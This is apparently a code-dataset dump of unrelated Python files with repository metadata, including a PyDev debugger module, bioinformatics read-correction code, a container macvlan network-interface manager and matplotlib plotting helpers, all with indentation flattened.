url='https://github.com/rembish/homebank-wui',
packages=find_packages(),
include_package_data=True,
data_files=[
('/usr/share/homebank/', ['data/sample.xhb']),
],
zip_safe=False,
install_requires=requirements,
**additional)
| 1.929688 | 2 |
packages/eclipse/plugins/org.python.pydev_4.4.0.201510052309/pysrc/pydevd_custom_frames.py | liangazhou/django-rdp | 0 | 12769711 | from pydevd_constants import * #@UnusedWildImport
from pydevd_file_utils import GetFilenameAndBase
from _pydev_imps import _pydev_thread
threadingCurrentThread = threading.currentThread
DEBUG = False
#=======================================================================================================================
# CustomFramesContainer
#=======================================================================================================================
class CustomFramesContainer:
pass
def CustomFramesContainerInit(): #Note: no staticmethod on jython 2.1 (so, use free-function)
CustomFramesContainer.custom_frames_lock = _pydev_thread.allocate_lock()
# custom_frames can only be accessed if properly locked with custom_frames_lock!
# Key is a string identifying the frame (as well as the thread it belongs to).
# Value is a CustomFrame.
#
CustomFramesContainer.custom_frames = {}
# Only to be used in this module
CustomFramesContainer._next_frame_id = 0
# This is the event we must set to release an internal process events. It's later set by the actual debugger
# when we do create the debugger.
CustomFramesContainer._py_db_command_thread_event = Null()
#Initialize it the first time (it may be reinitialized later on when dealing with a fork).
CustomFramesContainerInit()
#=======================================================================================================================
# CustomFrame
#=======================================================================================================================
class CustomFrame:
def __init__(self, name, frame, thread_id):
# 0 = string with the representation of that frame
self.name = name
# 1 = the frame to show
self.frame = frame
# 2 = an integer identifying the last time the frame was changed.
self.mod_time = 0
# 3 = the thread id of the given frame
self.thread_id = thread_id
def addCustomFrame(frame, name, thread_id):
CustomFramesContainer.custom_frames_lock.acquire()
try:
curr_thread_id = GetThreadId(threadingCurrentThread())
next_id = CustomFramesContainer._next_frame_id = CustomFramesContainer._next_frame_id + 1
# Note: the frame id kept contains an id and thread information on the thread where the frame was added
# so that later on we can check if the frame is from the current thread by doing frame_id.endswith('|'+thread_id).
frame_id = '__frame__:%s|%s' % (next_id, curr_thread_id)
if DEBUG:
sys.stderr.write('addCustomFrame: %s (%s) %s %s\n' % (
frame_id, GetFilenameAndBase(frame)[1], frame.f_lineno, frame.f_code.co_name))
CustomFramesContainer.custom_frames[frame_id] = CustomFrame(name, frame, thread_id)
CustomFramesContainer._py_db_command_thread_event.set()
return frame_id
finally:
CustomFramesContainer.custom_frames_lock.release()
def updateCustomFrame(frame_id, frame, thread_id, name=None):
CustomFramesContainer.custom_frames_lock.acquire()
try:
if DEBUG:
sys.stderr.write('updateCustomFrame: %s\n' % frame_id)
try:
old = CustomFramesContainer.custom_frames[frame_id]
if name is not None:
old.name = name
old.mod_time += 1
old.thread_id = thread_id
except:
sys.stderr.write('Unable to get frame to replace: %s\n' % (frame_id,))
import traceback;traceback.print_exc()
CustomFramesContainer._py_db_command_thread_event.set()
finally:
CustomFramesContainer.custom_frames_lock.release()
def getCustomFrame(thread_id, frame_id):
'''
:param thread_id: This should actually be the frame_id which is returned by addCustomFrame.
:param frame_id: This is the actual id() of the frame
'''
CustomFramesContainer.custom_frames_lock.acquire()
try:
frame_id = int(frame_id)
f = CustomFramesContainer.custom_frames[thread_id].frame
while f is not None:
if id(f) == frame_id:
return f
f = f.f_back
finally:
f = None
CustomFramesContainer.custom_frames_lock.release()
def removeCustomFrame(frame_id):
CustomFramesContainer.custom_frames_lock.acquire()
try:
if DEBUG:
sys.stderr.write('removeCustomFrame: %s\n' % frame_id)
DictPop(CustomFramesContainer.custom_frames, frame_id, None)
CustomFramesContainer._py_db_command_thread_event.set()
finally:
CustomFramesContainer.custom_frames_lock.release()
| 1.796875 | 2 |
one_more_layer_of_stacking/src/sf_utils.py | guitarmind/HPA-competition-solutions | 0 | 12769712 | <reponame>guitarmind/HPA-competition-solutions
import numpy as np
import pandas as pd
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.utils import shuffle
import matplotlib.pyplot as plt
plt.style.use('seaborn-white')
import seaborn as sns
sns.set_style("white")
from skimage.transform import resize
from skimage.color import rgb2gray, gray2rgb
from sklearn.metrics import f1_score, precision_score, recall_score, roc_auc_score
from tqdm import tqdm_notebook
import gc
import math
import sys
from fastai import *
from fastai.vision import *
np.random.seed(42)
data_dir = '../../../input/'
submit_l1_dir = "../../../submits/"
weights_dir = "../../weights/"
results_dir = '../../../results/'
name_label_dict = {
0: 'Nucleoplasm',
1: 'Nuclear membrane',
2: 'Nucleoli',
3: 'Nucleoli fibrillar center',
4: 'Nuclear speckles',
5: 'Nuclear bodies',
6: 'Endoplasmic reticulum',
7: 'Golgi apparatus',
8: 'Peroxisomes',
9: 'Endosomes',
10: 'Lysosomes',
11: 'Intermediate filaments',
12: 'Actin filaments',
13: 'Focal adhesion sites',
14: 'Microtubules',
15: 'Microtubule ends',
16: 'Cytokinetic bridge',
17: 'Mitotic spindle',
18: 'Microtubule organizing center',
19: 'Centrosome',
20: 'Lipid droplets',
21: 'Plasma membrane',
22: 'Cell junctions',
23: 'Mitochondria',
24: 'Aggresome',
25: 'Cytosol',
26: 'Cytoplasmic bodies',
27: 'Rods & rings' }
def kfold_threshold(y_true, y_pred):
n_classes = len(name_label_dict)
classes_thresholds = []
classes_scores = []
kf = StratifiedKFold(n_splits=5, shuffle=True, random_state=239)
for i in range(n_classes):
kf_class_thresholds = []
if (sum(y_true[:,i]) > 20):
for _, tst_inx in kf.split(y_true,y_true[:,i]):
t_min = np.min(y_pred[tst_inx,i])
t_max = np.max(y_pred[tst_inx,i])
thresholds = np.linspace(t_min, t_max, 50)
scores = np.array([
f1_score(y_true[tst_inx,i], np.int32(y_pred[tst_inx,i] >= threshold)) for threshold in thresholds
])
threshold_best_index = np.argmax(scores)
kf_class_thresholds.append(thresholds[threshold_best_index])
threshold = np.mean(kf_class_thresholds)
classes_thresholds.append(threshold)
f1 = f1_score(y_true[:,i], np.int32(y_pred[:,i] >= threshold))
classes_scores.append(f1)
else:
t_min = np.min(y_pred[:,i])
t_max = np.max(y_pred[:,i])
thresholds = np.linspace(t_min, t_max, 50)
scores = np.array([
f1_score(y_true[:,i], np.int32(y_pred[:,i] >= threshold)) for threshold in thresholds
])
threshold_best_index = np.argmax(scores)
classes_thresholds.append(thresholds[threshold_best_index])
f1 = f1_score(y_true[:,i], np.int32(y_pred[:,i] >= thresholds[threshold_best_index]))
classes_scores.append(f1)
return classes_thresholds, classes_scores | 1.625 | 2 |
layout_instructions.py | Susanne-ICDS/gsd-designer | 0 | 12769713 | <filename>layout_instructions.py
import dash_html_components as html
import dash_bootstrap_components as dbc
spacing_variables = {'offset': 1, 'size': 10, 'int_input': 1, 'float_input': 2}
vub_blue = '#003399'
label = html.B
def my_jumbo_box(header, sub_header):
return dbc.Row(
dbc.Col(width={'offset': spacing_variables['offset'], 'size': spacing_variables['size']},
children=[html.Br(),
html.H4(header, style={'color': 'white'}),
html.Label(sub_header, style={'color': 'white'}),
html.Br(),
html.Label(' ')]),
style={'background-color': vub_blue})
regular_text = html.Label
table_style = {
'css': [{'selector': '.dash-spreadsheet-container',
'rule': 'border-radius: 6px; overflow: hidden;'}],
'style_cell': {'fontSize': 16, 'font-family': 'sans-serif', 'text-align': 'left',
'padding': '12px'},
'style_header': {'color': 'white', 'background-color': vub_blue},
'style_data': {'color': '#343a40', 'background-color': 'white'}}
disabled_style_header = {'color': '#E8E8E8', 'background-color': '#808080'}
disabled_style_data = {'background-color': '#E8E8E8', 'color': '#808080'}
| 2.3125 | 2 |
src/rpds.py | hyubiglab/CAFE | 0 | 12769714 | <reponame>hyubiglab/CAFE
#!/share/apps/python/bin/python
import sys, os
import copy, math
import config as conf
import data as data
import module as module
import sam as sam
type = conf.rpds_type
order = conf.rpds_order
assembly = sys.argv[1]
unstranded = sys.argv[2]
stranded = sys.argv[3]
chr = sys.argv[4]
outputdir = sys.argv[5]
# matrix
if assembly == 'hg19': matrix_dir = data.hm_matrix
elif assembly == 'mm9': matrix_dir = data.ms_matrix
matrix_dic = dict()
if type == 'hmm':
for x in xrange(1, order+1):
matrix_dic[x] = dict()
matrix = open(matrix_dir + 'markov_' + str(x))
for line in matrix:
line = line.split(':')
matrix_dic[x][line[0]] = dict()
for y in xrange(1, 5):
matrix_dic[x][line[0]][line[y].split("'")[1]] = line[y+1].split(',')[0].split('}')[0]
def rpds(unstranded, stranded, chr):
finalMappingReads_dic = dict(); remainMappingReads_dic = dict(); npExonJunctionPairs_dic = dict()
npMappingReads_dic, npExonJunctionReads_dic, npReadPos_dic = module.getBamDict(unstranded, chr)
spReadPos_dic = module.getBamDictPos(stranded, chr, 'fr')
npReadPos = sorted(npReadPos_dic.keys()); spReadPos = sorted(spReadPos_dic.keys()); index = 0
for npPos in npReadPos: #unstranded read position
forwardReads = 0; reverseReads = 0; forwardRead = 0; reverseRead = 0
if len(spReadPos[max(0, index):]) > 0:
posList, distance = module.getAdjacentPos2(npPos, spReadPos[max(0, index):])
if int(distance) <= 50: ##
for i in range(len(posList)):
if len(spReadPos_dic[posList[i]]) > 1: #both strand
forwardRead = len(spReadPos_dic[posList[i]]['+']); reverseRead = len(spReadPos_dic[posList[i]]['-'])
else:
if spReadPos_dic[posList[i]].keys()[0] == '+':
forwardRead = len(spReadPos_dic[posList[i]]['+']); reverseRead = 0
else: #spReadPos_dic[posList[i]].keys()[0] == '-':
forwardRead = 0; reverseRead = len(spReadPos_dic[posList[i]]['-'])
forwardReads += forwardRead; reverseReads += reverseRead
index = spReadPos.index(posList[0]) - 10
fProb = 1; rProb = 1
if type == 'hmm':
if len(spReadPos[max(0, index):]) > 0:
apReads_dict = module.getAdjacentPos(npPos, spReadPos[max(0, index):])
apReads_list = apReads_dict.keys(); apReads_list.sort()
sense_list = []; nsense_list = []
if int(apReads_list[0]) <= 50: ##
snReads_dict = dict(); snReads_dict[0] = []
for snRead in apReads_dict[apReads_list[0]]: snReads_dict[0].append([snRead])
for x in xrange(1, order):
if len(spReadPos[max(0, index):]) > x and int(snReads_dict.keys()[0]) == x-1:
snReads_dict = module.getAdjacentPos4(snReads_dict, spReadPos[max(0, index):], x)
for snReads_pos in snReads_dict.values()[0]:
nsense_list2 = []
for snRead_pos in snReads_pos: nsense_list2 += [spReadPos_dic[snRead_pos].keys()]
nsense_list.append(nsense_list2)
for m in nsense_list:
nsense_list3 = []
for n in xrange(0, len(m)): nsense_list3 = module.return_sense(nsense_list3, m, n)
sense_list += nsense_list3
for sense in sense_list:
for j in xrange(0, len(sense)):
if j == 0:
fProb = float(fProb) * float(matrix_dic[j+1]['+']['+'+sense[j]])
rProb = float(rProb) * float(matrix_dic[j+1]['-']['-'+sense[j]])
else:
fProb = float(fProb) * float(matrix_dic[j+1]['+'][sense[j-1]+sense[j]])
rProb = float(rProb) * float(matrix_dic[j+1]['-'][sense[j-1]+sense[j]])
for npPosReads in npReadPos_dic[npPos].keys():
for npPosRead in npReadPos_dic[npPos][npPosReads]:
if int(distance) <= 50: npPosRead.setreadRatio(forwardReads, reverseReads)
else: npPosRead.setreadRatio(1, 1)
if type == 'hmm': npPosRead.setreadProb(fProb, rProb)
del npReadPos_dic, spReadPos_dic, npReadPos, spReadPos
mediateMappingReads_dic = copy.deepcopy(npMappingReads_dic)
for p in npMappingReads_dic.keys():
readNum = len(npMappingReads_dic[p])
if readNum > 1: #the mate is mapped
matchpos_dic = dict()
for m in range(len(npMappingReads_dic[p])):
for n in range(len(npMappingReads_dic[p])):
if (m < n and m != n):
pairRead1 = npMappingReads_dic[p][m]; pairRead2 = npMappingReads_dic[p][n]
if pairRead1.pos() == pairRead2.pnext() and pairRead1.pnext() == pairRead2.pos():
matchpos_dic[m] = ''; matchpos_dic[n] = ''; reconfirm = 0
if (float(pairRead1.readRatio()) == 1 and float(pairRead2.readRatio()) != 0) or (float(pairRead1.readRatio()) != 0 and float(pairRead2.readRatio()) == 1): reconfirm = 1
elif (float(pairRead1.readRatio()) == 0 and float(pairRead2.readRatio()) != 1) or (float(pairRead1.readRatio()) != 1 and float(pairRead2.readRatio()) == 0): reconfirm = -1
else:
if type == 'hmm':
if (pairRead1.readProb() == 1 and pairRead2.readProb() == 1): pass
elif (pairRead1.readProb() == 1111 and pairRead2.readProb() != -1111) or (pairRead1.readProb() != -1111 and pairRead2.readProb() == 1111): reconfirm = 1
elif (pairRead1.readProb() == -1111 and pairRead2.readProb() != 1111) or (pairRead1.readProb() != 1111 and pairRead2.readProb() == -1111): reconfirm = -1
elif (pairRead1.readProb() >= 1 and pairRead2.readProb() > 1) or (pairRead1.readProb() > 1 and pairRead2.readProb() >= 1): reconfirm = 1
elif (pairRead1.readProb() <= 1 and pairRead2.readProb() < 1) or (pairRead1.readProb() < 1 and pairRead2.readProb() <= 1): reconfirm = -1
else: pass
if reconfirm == 0:
if (float(pairRead1.readRatio()) >= 0.99 and float(pairRead2.readRatio()) >= 0.5) or (float(pairRead1.readRatio()) >= 0.5 and float(pairRead2.readRatio()) >= 0.99): reconfirm = 1
elif (float(pairRead1.readRatio()) <= 0.01 and float(pairRead2.readRatio()) <= 0.5) or (float(pairRead1.readRatio()) <= 0.5 and float(pairRead2.readRatio()) <= 0.01): reconfirm = -1
else:
if (float(pairRead1.readRatio()) > 0.5 and float(pairRead2.readRatio()) >= 0.5) or (float(pairRead1.readRatio()) >= 0.5 and float(pairRead2.readRatio()) > 0.5): reconfirm = 1
elif (float(pairRead1.readRatio()) < 0.5 and float(pairRead2.readRatio()) <= 0.5) or (float(pairRead1.readRatio()) <= 0.5 and float(pairRead2.readRatio()) < 0.5): reconfirm = -1
else:
if (float(pairRead1.readRatio()) == 0.5 and float(pairRead2.readRatio()) == 0.5): pass
elif float(pairRead1.readRatio()) > 0.5:
if 1-float(pairRead1.readRatio()) < float(pairRead2.readRatio()): reconfirm = 1
else: reconfirm = -1
elif float(pairRead1.readRatio()) < 0.5:
if float(pairRead1.readRatio()) < 1-float(pairRead2.readRatio()): reconfirm = -1
else: reconfirm = 1
else: pass
if reconfirm != 0:
if reconfirm == 1:
pairRead1.setreadRatio(1,0); pairRead2.setreadRatio(1,0)
else: #reconfirm == -1:
pairRead1.setreadRatio(0,1); pairRead2.setreadRatio(0,1)
npairRead1 = module.flagCorrection(pairRead1); npairRead2 = module.flagCorrection(pairRead2)
if not finalMappingReads_dic.has_key(p): finalMappingReads_dic[p] = []
finalMappingReads_dic[p].extend([npairRead1, npairRead2])
else: #reconfirm == 0:
if not remainMappingReads_dic.has_key(p): remainMappingReads_dic[p] = []
remainMappingReads_dic[p].extend([pairRead1, pairRead2])
if len(matchpos_dic.keys()) > 0:
matchposList = sorted(matchpos_dic.keys()); matchposList.reverse()
if len(matchposList) == len(mediateMappingReads_dic[p]):
del mediateMappingReads_dic[p]
else:
for matchpos in matchposList:
del mediateMappingReads_dic[p][matchpos]
del npMappingReads_dic
for h in mediateMappingReads_dic.keys(): #the mate is unmapped
for l in range(len(mediateMappingReads_dic[h])):
singleRead = mediateMappingReads_dic[h][l]
jpair = -1
if singleRead.qname() in npExonJunctionReads_dic.keys():
for s in range(len(npExonJunctionReads_dic[singleRead.qname()])):
npjread = npExonJunctionReads_dic[singleRead.qname()][s]
if singleRead.pos() == npjread.pnext() and singleRead.pnext() == npjread.pos():
if 'XS:A:+' in npjread.tag(): singleRead.setreadRatio(1,0) #forward strand
else: singleRead.setreadRatio(0,1) #reverse strand
nsingleRead = module.flagCorrection(singleRead)
if not npExonJunctionPairs_dic.has_key(singleRead.qname()):
npExonJunctionPairs_dic[singleRead.qname()] = []
npExonJunctionPairs_dic[singleRead.qname()].append(nsingleRead)
jpair = 1; break
if jpair < 0:
jsingle = 0
if float(singleRead.readRatio()) == 1: jsingle = 1
elif float(singleRead.readRatio()) == 0: jsingle = -1
else:
if type == 'hmm':
if singleRead.readProb() > 1: jsingle = 1
elif singleRead.readProb() < 1: jsingle = -1
else: pass
if jsingle == 0:
if float(singleRead.readRatio()) > 0.5: jsingle = 1
elif float(singleRead.readRatio()) < 0.5: jsingle = -1
else: pass
if jsingle != 0:
if jsingle == 1:
singleRead.setreadRatio(1, 0)
else: #jsingle == -1:
singleRead.setreadRatio(0, 1)
nsingleRead = module.flagCorrection(singleRead)
if not finalMappingReads_dic.has_key(nsingleRead.qname()):
finalMappingReads_dic[nsingleRead.qname()] = []
finalMappingReads_dic[nsingleRead.qname()].append(nsingleRead)
else: #jsingle == 0:
if not remainMappingReads_dic.has_key(singleRead.qname()):
remainMappingReads_dic[singleRead.qname()] = []
remainMappingReads_dic[singleRead.qname()].append(singleRead)
del mediateMappingReads_dic
outputFile = open(outputdir + '/logs/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + '.logs', 'w')
coutputSam = open(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'c.sam', 'w')
routputSam = open(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'u.sam', 'w')
module.writeSamHeader(coutputSam, assembly); module.writeSamHeader(routputSam, assembly)
correctedReadsNum = 0; uncorrectedReadsNum = 0
for a1 in finalMappingReads_dic.keys():
for a2 in finalMappingReads_dic[a1]:
coutputSam.write(module.writeSam(a2) + '\n')
correctedReadsNum += 1
for b1 in npExonJunctionReads_dic.keys():
for b2 in npExonJunctionReads_dic[b1]:
coutputSam.write(module.writeSam(b2) + '\n')
correctedReadsNum += 1
for c1 in npExonJunctionPairs_dic.keys():
for c2 in npExonJunctionPairs_dic[c1]:
coutputSam.write(module.writeSam(c2) + '\n')
correctedReadsNum += 1
for d1 in remainMappingReads_dic.keys():
for d2 in remainMappingReads_dic[d1]:
routputSam.write(module.writeSam(d2) + '\n')
uncorrectedReadsNum += 1
outputFile.write(chr + '\t' + str(correctedReadsNum) + '\t' + str(uncorrectedReadsNum) + '\n')
outputFile.close(); coutputSam.close(); routputSam.close()
rpds(unstranded, stranded, chr)
sam.samToBam(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'c.sam')
sam.bamSort(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'c.bam')
sam.bamIndex(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'c.bam')
| 2.140625 | 2 |
vector.py | progs2002/Langton-s-Ant | 4 | 12769715 | <gh_stars>1-10
class Vector:
def __init__(self,x,y):
self.x=x
self.y=y
def __repr__(self):
return str(self.x) +"i, "+ str(self.y)+"j"
def dotProduct(v1,v2):
return v1.x*v2.x + v1.y*v2.y | 2.96875 | 3 |
src/container/cni/cni/common/macvlan.py | casek14/contrail-controller | 1 | 12769716 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2016 Juniper Networks, Inc. All rights reserved.
#
"""
CNI implementation
Demultiplexes on the CNI_COMMAND and runs the necessary operation
"""
import ctypes
import errno
import inspect
import json
import os
import sys
import logging
from pyroute2 import NetlinkError, IPRoute
from interface import Interface as CniInterface
from interface import CniNamespace as CniNamespace
from cni import Error as Error
CNI_ERROR_GET_PARENT_INTF = 401
CNI_ERROR_ADD_VLAN_INTF = 402
CNI_ERROR_DEL_VLAN_INTF = 403
CNI_ERROR_ADD_MACVLAN = 404
CNI_ERROR_DEL_MACVLAN = 405
# logger for the file
logger = None
class CniMacVlan(CniInterface, object):
'''
Class to manage macvlan interfaces for containers.
This is typically used in nested-k8s scenario where containers are spawned
inside the container. The VMI for container is modeled as sub-interface in
this case.
The class creates a vlan-interface corresponding to the vlan in
sub-interface and then creates a macvlan interface over it.
'''
def __init__(self, cni, mac, host_ifname, tag):
self.pid = os.getpid()
self.container_mac = mac
self.host_ifname = host_ifname
self.vlan_tag = tag
self.vlan_ifname = CniMacVlan._make_vlan_intf_name(tag)
CniInterface.__init__(self, cni)
return
@staticmethod
def _make_vlan_intf_name(tag):
return 'cn-' + str(tag)
def delete_interface(self):
'''
Delete the interface.
Deletes both VLAN Tag interface and MACVlan interface
'''
# Find the VLAN interface interface from the MACVlan interface
link = self.get_link()
if link is None:
return
vlan_idx = None
for i in link[0]['attrs']:
if (i[0] == 'IFLA_LINK'):
vlan_idx = i[1]
break
if vlan_idx is None:
raise Error(CNI_ERROR_DEL_VLAN_INTF,
'Error finding vlan interface. Interface inside ' +
' container ' + self.cni.container_ifname)
# Delete the VLAN Tag interface.
# It will delete the interface inside container also
try:
iproute = IPRoute()
iproute.link('del', index=vlan_idx)
except NetlinkError as e:
raise Error(CNI_ERROR_DEL_VLAN_INTF,
'Error deleting VLAN interface. Parent interface ' +
self.host_ifname + ' vlan-tag ' + self.vlan_tag +
' vlan-ifindex ' + str(vlan_idx) +
' code ' + str(e.code) + ' message ' + e.message)
return
def _locate_parent_interface(self, iproute):
# Ensure the host parent-interface is preset in host network-namespace
host_if = iproute.link_lookup(ifname=self.host_ifname)
if len(host_if) == 0:
raise Error(CNI_ERROR_GET_PARENT_INTF,
'Error creating parent interface ' +
self.host_ifname + '. Interface not found')
return host_if[0]
def _locate_vlan_interface(self, iproute, parent_ifindex):
# Ensure vlan-interface is created in the host network-namespace
vlan_if = iproute.link_lookup(ifname=self.vlan_ifname)
if len(vlan_if) is not 0:
# vlan-interface already present
return vlan_if[0]
try:
# Create vlan-interface
iproute.link('add', ifname=self.vlan_ifname, kind='vlan',
vlan_id=self.vlan_tag, link=parent_ifindex)
except NetlinkError as e:
if e.code != errno.EEXIST:
raise Error(CNI_ERROR_ADD_VLAN_INTF,
'Error creating vlan interface. ' +
' Parent interface ' + self.host_ifname +
' vlan id ' + str(self.vlan_tag) +
' vlan ifname ' + self.vlan_ifname +
' code ' + str(e.code) +
' message ' + e.message)
vlan_if = iproute.link_lookup(ifname=self.vlan_ifname)
return vlan_if[0]
# Ensure the temporary interface is created and moved to
# container network-namespace
def _locate_peer_vlan_interface(self, iproute, cn_iproute, vlan_ifindex,
cn_ifname):
# Check if interface already present in container network-namespace
cn_intf = cn_iproute.link_lookup(ifname=cn_ifname)
if len(cn_intf) is not 0:
return cn_intf[0]
# Interface not present inside container.
# Check if it was already created in host network-namespace
cn_intf = iproute.link_lookup(ifname=cn_ifname)
if len(cn_intf) == 0:
# Interface not present in host network-namespace also
# Create interface in host-os first
try:
iproute.link('add', ifname=cn_ifname, kind='macvlan',
link=vlan_ifindex, macvlan_mode='vepa')
except NetlinkError as e:
if e.code != errno.EEXIST:
raise Error(CNI_ERROR_ADD_MACVLAN,
'Error creating macvlan interface ' +
cn_ifname +
' vlan iterface ' + self.vlan_ifname +
' code ' + str(e.code) +
' message ' + e.message)
cn_intf = iproute.link_lookup(ifname=cn_ifname)
# Move the temporary interface to container network-namespace
with CniNamespace(self.cni.container_netns):
iproute.link('set', index=cn_intf[0], net_ns_pid=self.pid)
return cn_intf[0]
def _move_link(self, cn_iproute, cn_intf):
with CniNamespace(self.cni.container_netns):
cn_iproute.link('set', index=cn_intf,
ifname=self.cni.container_ifname)
return
def create_interface(self):
'''
Create MACVlan interface
Creates VLAN interface first based on VLAN tag for sub-interface
then create macvlan interface above the vlan interface
'''
# First check if interface already present inside container
if self.get_link() is not None:
return
if self.vlan_tag is None:
raise Error(CNI_ERROR_ADD_VLAN_INTF,
'Missing vlan-tag for macvlan interface' )
if self.host_ifname is None:
raise Error(CNI_ERROR_ADD_VLAN_INTF,
'Missing parent-interface for macvlan interface')
# Open IPRoute socket in both host and container network namespaces
iproute = IPRoute()
cn_iproute = None
with CniNamespace(self.cni.container_netns):
cn_iproute = IPRoute()
# Locate the parent interface in host-os network-namespace
host_ifindex = self._locate_parent_interface(iproute)
# Locate vlan interface in host-os network-namespace
vlan_ifindex = self._locate_vlan_interface(iproute, host_ifindex)
# Creating interface inside container involves following steps,
# 1. Create a macvlan interface in host network-namespace with a
# temporary name
# 2. Move temporary interface inside container
# 3. Rename temporary interface to configured name inside container
# We must also ensure that we recover from any of the failed state
# in earlier invocation
# Ensure temporary interface present inside container
cn_ifname = self.vlan_ifname + '-cn'
cn_ifindex = self._locate_peer_vlan_interface(iproute, cn_iproute,
vlan_ifindex, cn_ifname)
# Move temporary interface to container-ifname
self._move_link(cn_iproute, cn_ifindex)
return
def configure_interface(self, ip4, plen, gw):
# Set link-up for interface on host-os
iproute = IPRoute()
idx = iproute.link_lookup(ifname=self.vlan_ifname)[0]
iproute.link('set', index=idx, state='up')
super(CniMacVlan, self).configure_interface(ip4, plen, gw)
| 2.453125 | 2 |
L1TriggerConfig/L1TConfigProducers/python/L1TMuonEndcapParamsOnlineProxy_cfi.py | pasmuss/cmssw | 0 | 12769717 | <filename>L1TriggerConfig/L1TConfigProducers/python/L1TMuonEndcapParamsOnlineProxy_cfi.py<gh_stars>0
import FWCore.ParameterSet.Config as cms
#from L1Trigger.L1TMuonEndcap.fakeEmtfParams_cff import *
L1TMuonEndcapParamsOnlineProxy = cms.ESProducer("L1TMuonEndcapParamsOnlineProxy",
PtAssignVersion = cms.untracked.uint32(1),
firmwareVersion = cms.untracked.uint32(47423),
changeDate = cms.untracked.uint32(20161101)
)
| 1.265625 | 1 |
qharv/field/kyrt.py | Paul-St-Young/harvest_qmcpack | 2 | 12769718 | # Author: Yubo "Paul" Yang
# Email: <EMAIL>
# Kyrt is a versatile fabric exclusive to the planet Florina of Sark.
# The fluorescent and mutable kyrt is ideal for artsy decorations.
# OK, this is a library of reasonable defaults for matplotlib figures.
# May this library restore elegance to your plots.
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter
# ======================== library of defaults =========================
# expose some default colors for convenience
from matplotlib.cm import get_cmap
cmap = get_cmap('viridis')
colors = cmap.colors # 256 default colors
dark8 = [ # Colors from www.ColorBrewer.org by Cynthia A. Brewer, Geography, Pennsylvania State University.
'#1b9e77',
'#d95f02',
'#7570b3',
'#e7298a',
'#66a61e',
'#e6ab02',
'#a6761d',
'#666666'
]
errorbar_style = {
'cyq': {
'linestyle': 'none', # do 1 thing
'markersize': 3.5, # readable
'markeredgecolor': 'black', # accentuate
'markeredgewidth': 0.3,
'capsize': 4,
'elinewidth': 0.5
}
}
# ======================== level 0: basic color =========================
def get_cmap(name='viridis'):
""" return color map by name
Args:
name (str, optional): name of color map, default 'viridis'
Return:
matplotlib.colors.ListedColormap: requested colormap
"""
from matplotlib import cm
cmap = cm.get_cmap(name)
return cmap
def get_norm(vmin, vmax):
""" return norm function for scalar in range (vmin, vmax)
Args:
vmin (float): value minimum
vmax (float): value maximum
Return:
matplotlib.colors.Normalize: color normalization function
"""
norm = plt.Normalize(vmin, vmax)
return norm
def scalar_colormap(vmin, vmax, name='viridis'):
""" return a function that maps a number to a color
Args:
vmin (float): minimum scalar value
vmax (float): maximum scalar value
name (str, optional): color map name, default is 'viridis'
Return:
function: float -> (float,)*4 RGBA color space
"""
cmap = get_cmap(name)
norm = get_norm(vmin, vmax)
def v2c(v): # function mapping value to color
return cmap(norm(v))
return v2c
def scalar_colorbar(vmin, vmax, name='viridis', **kwargs):
""" return a colorbar for scalar_color_map()
Args:
vmin (float): minimum scalar value
vmax (float): maximum scalar value
name (str, optional): color map name, default is 'viridis'
Return:
matplotlib.colorbar.Colorbar: colorbar
"""
cmap = get_cmap(name)
norm = get_norm(vmin, vmax)
# issue 3644
sm = plt.cm.ScalarMappable(norm=norm, cmap=cmap)
sm.set_array([])
cbar = plt.colorbar(sm, **kwargs)
return cbar
# ======================== level 0: basic ax edits =========================
def figaxad(labelsize=12):
""" construct a absolute/difference (ad) figure
top 3/4 of the plot will be comparison at an absolute scale
bottom 1/4 of the plot will be comparison at a relative scale
Args:
labelsize (int, optional): tick label size
Return:
(fig, axa, axd): figure and axes for absolute and difference plots
"""
from matplotlib.gridspec import GridSpec
gs = GridSpec(4, 4)
fig = plt.figure()
axa = fig.add_subplot(gs[0:3, :])
axd = fig.add_subplot(gs[3, :], sharex=axa)
plt.setp(axa.get_xticklabels(), visible=False)
axa.tick_params(axis='y', labelsize=labelsize)
axd.tick_params(labelsize=labelsize)
fig.subplots_adjust(hspace=0)
return fig, axa, axd
def set_xy_format(ax, xfmt='%3.2f', yfmt='%3.2f'):
""" change x,y tick formats e.g. number of digits
Args:
ax (plt.Axes): matplotlib axes
xfmt (int,optional): xtick format, default is '%3.2f'
yfmt (int,optional): ytick format, default is '%3.2f'
"""
ax.get_xaxis().set_major_formatter(FormatStrFormatter(xfmt))
ax.get_yaxis().set_major_formatter(FormatStrFormatter(yfmt))
def set_tick_font(ax, xsize=14, ysize=14,
xweight='bold', yweight='bold', **kwargs):
""" change x,y tick fonts
Args:
ax (plt.Axes): matplotlib axes
xsize (int,optional): xtick fontsize, default is 14
ysize (int,optional): ytick fontsize, default is 14
xweight (str,optional): xtick fontweight, default is 'bold'
yweight (str,optional): ytick fontweight, default is 'bold'
kwargs (dict): other tick-related properties
"""
plt.setp(ax.get_xticklabels(), fontsize=xsize,
fontweight=xweight, **kwargs)
plt.setp(ax.get_yticklabels(), fontsize=ysize,
fontweight=yweight, **kwargs)
def set_label_font(ax, xsize=14, ysize=14,
xweight='bold', yweight='bold', **kwargs):
""" change x,y label fonts
Args:
ax (plt.Axes): matplotlib axes
xsize (int,optional): xlabel fontsize, default is 14
ysize (int,optional): ylabel fontsize, default is 14
xweight (str,optional): xlabel fontweight, default is 'bold'
yweight (str,optional): ylabel fontweight, default is 'bold'
kwargs (dict): other label-related properties
"""
plt.setp(ax.xaxis.label, fontsize=xsize,
fontweight=xweight, **kwargs)
plt.setp(ax.yaxis.label, fontsize=ysize,
fontweight=yweight, **kwargs)
def xtop(ax):
""" move xaxis label and ticks to the top
Args:
ax (plt.Axes): matplotlib axes
"""
xaxis = ax.get_xaxis()
xaxis.tick_top()
xaxis.set_label_position('top')
def yright(ax):
""" move yaxis label and ticks to the right
Args:
ax (plt.Axes): matplotlib axes
"""
yaxis = ax.get_yaxis()
yaxis.tick_right()
